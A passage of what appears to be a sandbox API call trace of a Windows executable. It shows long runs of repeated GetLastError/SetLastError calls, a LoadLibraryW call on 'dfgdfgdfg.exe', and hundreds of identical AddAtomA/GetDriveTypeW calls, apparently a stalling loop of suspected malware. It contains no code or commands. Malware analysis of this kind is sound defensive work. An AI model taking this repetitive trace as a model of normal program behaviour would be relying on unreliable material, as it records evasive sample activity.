(dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.269] SetLastError (dwErrCode=0x0) [0093.269] GetLastError () returned 0x0 [0093.270] SetLastError 
(dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.270] GetLastError () returned 0x0 [0093.270] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError 
(dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.271] GetLastError () returned 0x0 [0093.271] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.272] GetLastError () returned 0x0 [0093.272] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError 
(dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.273] SetLastError (dwErrCode=0x0) [0093.273] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.274] GetLastError () returned 0x0 [0093.274] SetLastError (dwErrCode=0x0) [0093.275] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0093.275] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0093.276] LoadLibraryW (lpLibFileName="dfgdfgdfg.exe") returned 0x0 [0093.276] AddAtomA (lpString=0x0) returned 0x0 [0093.276] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0093.276] AddAtomA (lpString=0x0) returned 0x0 [0093.276] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.277] AddAtomA (lpString=0x0) returned 0x0 [0093.277] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) 
returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.278] AddAtomA (lpString=0x0) returned 0x0 [0093.278] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) 
returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.282] AddAtomA (lpString=0x0) returned 0x0 [0093.282] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.282] AddAtomA (lpString=0x0) returned 0x0 [0093.282] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.282] AddAtomA (lpString=0x0) returned 0x0 [0093.282] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.282] AddAtomA (lpString=0x0) returned 0x0 [0093.282] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.282] AddAtomA (lpString=0x0) returned 0x0 [0093.282] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.282] AddAtomA (lpString=0x0) returned 0x0 [0093.282] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.282] AddAtomA (lpString=0x0) returned 0x0 [0093.282] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0093.282] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) 
returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] 